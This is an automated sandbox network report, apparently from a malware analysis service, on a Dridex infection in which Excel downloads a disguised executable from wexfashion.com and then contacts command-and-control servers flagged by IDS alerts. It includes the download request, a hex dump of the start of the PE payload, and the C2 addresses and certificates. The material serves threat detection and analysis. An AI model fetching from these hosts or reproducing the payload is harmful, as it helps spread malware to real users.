                                                                                                                                01/11/21-20:49:45.743750TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493915.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:45.743750TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493915.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:46.785083TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939377.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:47.309857TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939480.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:49:47.840144TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493955.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:47.840144TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493955.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:49:48.890333TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939777.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:49:49.416773TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939880.86.91.27192.168.2.22

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 11, 2021 20:47:35.885713100 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.073633909 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.073721886 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.074425936 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.272814035 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.272876978 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.272913933 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.272963047 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.273005009 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.273042917 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.273082018 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.273092985 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.273108006 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.273112059 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.273121119 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.273149014 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.273156881 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.273180008 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.273195028 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.273212910 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.273243904 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.278430939 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.462656975 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.462718964 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.462749958 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.462773085 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.463792086 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.463836908 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.463855028 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.463874102 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.463882923 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.463911057 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.463921070 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.463963032 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.463975906 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.464004993 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.464332104 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.464373112 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.464391947 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.464409113 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.464421988 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.464446068 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.464456081 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.464481115 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.464483976 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.464533091 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.465023041 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660279036 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660346985 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660386086 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660425901 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660464048 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660500050 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660537004 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660576105 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660587072 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660605907 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660608053 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660609961 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660623074 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660634041 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660665989 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660681963 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660702944 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660712004 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660741091 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660741091 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660782099 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660820007 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660823107 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.660845995 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.660876036 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.661947966 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.661986113 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662023067 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662054062 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662060022 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662086964 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662096024 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662113905 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662134886 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662144899 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662170887 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662173033 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662220001 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662223101 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662262917 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.662272930 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662319899 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.662945986 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.860807896 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860872030 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860902071 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860932112 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.860970020 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861008883 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861046076 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861093998 CET8049165198.54.125.162192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:36.861097097 CET4916580192.168.2.22198.54.125.162
                                                                                                                                Jan 11, 2021 20:47:36.861114025 CET4916580192.168.2.22198.54.125.162

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 11, 2021 20:47:35.802675962 CET5219753192.168.2.228.8.8.8
                                                                                                                                Jan 11, 2021 20:47:35.867634058 CET53521978.8.8.8192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:41.924619913 CET5309953192.168.2.228.8.8.8
                                                                                                                                Jan 11, 2021 20:47:41.985228062 CET53530998.8.8.8192.168.2.22
                                                                                                                                Jan 11, 2021 20:47:41.997029066 CET5283853192.168.2.228.8.8.8
                                                                                                                                Jan 11, 2021 20:47:42.045030117 CET53528388.8.8.8192.168.2.22
                                                                                                                                Jan 11, 2021 20:48:13.756444931 CET6120053192.168.2.228.8.8.8
                                                                                                                                Jan 11, 2021 20:48:13.813184977 CET53612008.8.8.8192.168.2.22
                                                                                                                                Jan 11, 2021 20:48:13.831610918 CET4954853192.168.2.228.8.8.8
                                                                                                                                Jan 11, 2021 20:48:13.888201952 CET53495488.8.8.8192.168.2.22
                                                                                                                                Jan 11, 2021 20:48:15.015911102 CET5562753192.168.2.228.8.8.8
                                                                                                                                Jan 11, 2021 20:48:15.063836098 CET53556278.8.8.8192.168.2.22
                                                                                                                                Jan 11, 2021 20:48:15.076841116 CET5600953192.168.2.228.8.8.8
                                                                                                                                Jan 11, 2021 20:48:15.124778032 CET53560098.8.8.8192.168.2.22

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                Jan 11, 2021 20:47:35.802675962 CET192.168.2.228.8.8.80xfc39Standard query (0)wexfashion.comA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                Jan 11, 2021 20:47:35.867634058 CET8.8.8.8192.168.2.220xfc39No error (0)wexfashion.com198.54.125.162A (IP address)IN (0x0001)
                                                                                                                                Jan 11, 2021 20:48:15.063836098 CET8.8.8.8192.168.2.220xd799No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                Jan 11, 2021 20:48:15.063836098 CET8.8.8.8192.168.2.220xd799No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                Jan 11, 2021 20:48:15.124778032 CET8.8.8.8192.168.2.220x689dNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                Jan 11, 2021 20:48:15.124778032 CET8.8.8.8192.168.2.220x689dNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • wexfashion.com

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                0192.168.2.2249165198.54.125.16280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Jan 11, 2021 20:47:36.074425936 CET0OUTGET /k04qkvqu.zip HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                UA-CPU: AMD64
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                Host: wexfashion.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2021 20:47:36.272814035 CET2INHTTP/1.1 200 OK
                                                                                                                                date: Mon, 11 Jan 2021 19:47:36 GMT
                                                                                                                                server: Apache
                                                                                                                                last-modified: Mon, 11 Jan 2021 08:08:04 GMT
                                                                                                                                accept-ranges: bytes
                                                                                                                                content-length: 318976
                                                                                                                                content-type: application/zip
                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 c1 97 fc 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 7a 04 00 00 60 00 00 00 00 00 00 d0 26 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 82 00 00 8c 00 00 00 00 00 05 00 7c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 86 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 24 00 00 00 10 00 00 00 26 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 40 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 33 00 d8 03 00 00 00 50 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 60 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 46 00 00 00 00 70 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 1b 00 00 00 80 00 00 00 1c 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 cc 52 04 00 00 a0 00 00 00 54 04 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 7c 2e 00 00 00 00 05 00 00 30 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 30 05 00 00 0a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 8b 45 0c 89 45 fc 8b 0d 28 9b 00 10 89 4d 08 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 8b 55 fc 8d b4 02 66 a1 06 00 68 5c 11 00 00 6a 00 ff 15 74 80 00 10 03 f0 8b 45 08 03 30 8b 4d 08 89 31 8b 55 08 8b 02 2d 66 a1 06 00 8b 4d 08 89 01 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 a1 d8 9a 00 10 89 45 fc 8b 65 fc 58 8b e8 a1 f4 9a 00 10
                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2z`&@@|.0P.text$& `.rdata@*@@.rdata3P,@@.2`0@@.rdata2Fp2@@.data`4@.text4RTP @.rsrc|.0@@.relocP0@BUQVEE(Mh\jtUfh\jtE0M1U-fM^]UQEeX


                                                                                                                                HTTPS Packets

                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                Jan 11, 2021 20:47:41.098542929 CET77.220.64.37443192.168.2.2249166CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:47:45.534218073 CET77.220.64.37443192.168.2.2249171CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:47:47.673510075 CET77.220.64.37443192.168.2.2249175CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:47:49.762134075 CET77.220.64.37443192.168.2.2249179CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:47:51.899759054 CET77.220.64.37443192.168.2.2249183CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:47:53.972881079 CET77.220.64.37443192.168.2.2249187CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:47:56.048129082 CET77.220.64.37443192.168.2.2249191CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:47:58.141264915 CET77.220.64.37443192.168.2.2249195CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:01.461744070 CET77.220.64.37443192.168.2.2249199CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:03.625437021 CET77.220.64.37443192.168.2.2249203CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:05.735889912 CET77.220.64.37443192.168.2.2249207CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:07.828960896 CET77.220.64.37443192.168.2.2249211CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:09.938127995 CET77.220.64.37443192.168.2.2249215CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:12.337016106 CET77.220.64.37443192.168.2.2249219CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:14.395801067 CET77.220.64.37443192.168.2.2249224CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:17.015165091 CET77.220.64.37443192.168.2.2249229CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:20.087624073 CET77.220.64.37443192.168.2.2249233CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:22.192375898 CET77.220.64.37443192.168.2.2249237CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
